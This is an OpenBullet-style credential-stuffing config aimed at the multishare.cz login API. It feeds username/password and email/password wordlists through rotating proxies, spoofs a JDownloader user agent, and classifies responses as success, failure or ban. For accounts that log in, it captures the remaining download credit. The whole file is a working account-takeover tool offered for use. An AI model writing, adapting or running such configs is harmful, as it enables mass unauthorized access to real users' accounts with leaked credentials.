[SETTINGS]
{
  "Name": "Multishare CZ",
  "SuggestedBots": 100,
  "LastModified": "2018-05-09T01:58:40.2418614+00:00",
  "AdditionalInfo": "Debrid site.",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#LOGIN REQUEST POST "https://www.multishare.cz/api/?" AutoRedirect=TRUE 
  CONTENT "login=<USER>&password=<PASS>&sub=account-details" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: JDownloader" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "ERR: User account is not activated." 
    KEY "ERR: Invalid password." 
    KEY "User does not exists" 
  KEYCHAIN Success OR 
    KEY "\"credit\"" 
  KEYCHAIN Ban OR 
    KEY "entered wrong login/password too many times" 
#PARSE_CREDIT PARSE "<SOURCE>" JSON "credit" Recursive=FALSE -> VAR "CREDIT" "" "" 
#CONVERT_CREDIT_TO_GB FUNCTION Compute "<CREDIT>/1000" -> VAR "CREDIT2" 
#GET_GB FUNCTION RegexMatch "([^,]+)" "<CREDIT2>" -> VAR "GB" 
#GET_MB FUNCTION RegexMatch "(?<=,)[\w+.-]+" "<CREDIT2>" -> VAR "MB" 
#ADD_PREFIX FUNCTION Constant "<GB> GB and <MB> MB" -> VAR "CREDIT3" 
#CAPTURE_CREDIT PARSE "<CREDIT3>" LR "" "" Recursive=FALSE -> CAP "Credit" "" "" 
